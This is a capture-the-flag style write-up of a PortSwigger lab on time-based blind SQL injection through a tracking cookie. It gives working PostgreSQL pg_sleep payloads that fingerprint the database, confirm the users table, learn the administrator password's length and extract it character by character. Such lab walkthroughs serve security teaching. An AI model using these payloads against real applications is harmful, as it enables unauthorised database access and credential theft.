This lab contains a [blind SQL injection](https://portswigger.net/web-security/sql-injection/blind) vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

The database contains a different table called `users`, with columns called `username` and `password`. You need to exploit the blind [SQL injection](https://portswigger.net/web-security/sql-injection) vulnerability to find out the password of the `administrator` user.

To solve the lab, log in as the `administrator` user

# Practical
Again we only have the tracking cookie as our vulnerable parameter so let's get right to it.
```html
TrackingId=OzWrP6JbpFuqiEWi;
```
There's no Welcome back message so we can't do conditional statements, which leaves us to only time delays.
Let's imagine how the query looks like first.
```sql
select tracking-id from tracking-table where TrackingID='OzWrP6JbpFuqiEWi' 
```
So let's determine first what database it's using.
Try all the time delay syntax and determine it.
So our payload is :
```sql
' || pg_sleep(10)--
```

```sql
select tracking-id from tracking-table where TrackingID='OzWrP6JbpFuqiEWi' || pg_sleep(10)--'
```
And it's postgreSQL.
Let's start crafting a payload to confirm that the users table exist.
```sql
' || (SELECT CASE WHEN (username='administrator') then pg_sleep(10) else pg_sleep(-1)end FROM users)--
```

And we can see that its delayed so username administrator exist and users table exist
Now let's determine the length of password.
```sql
' || (SELECT CASE WHEN (username='administrator' AND LENGTH(password)>1) then pg_sleep(10) else pg_sleep(-1)end FROM users)--
```

And again we get a delay so the condition must be true, let's try it with less than 1.
And we immediately get a response, so last time our password was 20 length, so let's check for that again.
```sql
' || (SELECT CASE WHEN (username='administrator' AND LENGTH(password)=20) then pg_sleep(10) else pg_sleep(-1)end FROM users)--
```
We get a 10 sec delay which is a good sign which means it's true. So now we now only need the characters of the password.
Let's start crafting the payload.
```sql
' || (SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,1,1)='a') then pg_sleep(3) else pg_sleep(-1)end FROM users)--
```
Now let's run this in burp intruder. One thing to note there will be false positives, make sure to run only on 1 tread and check the results if there were any duplicates.
```txt
op7qnz338ozfbnrnaudx
```

In my case there were duplicates, and I had to double check some, so keep a tab on repeater.
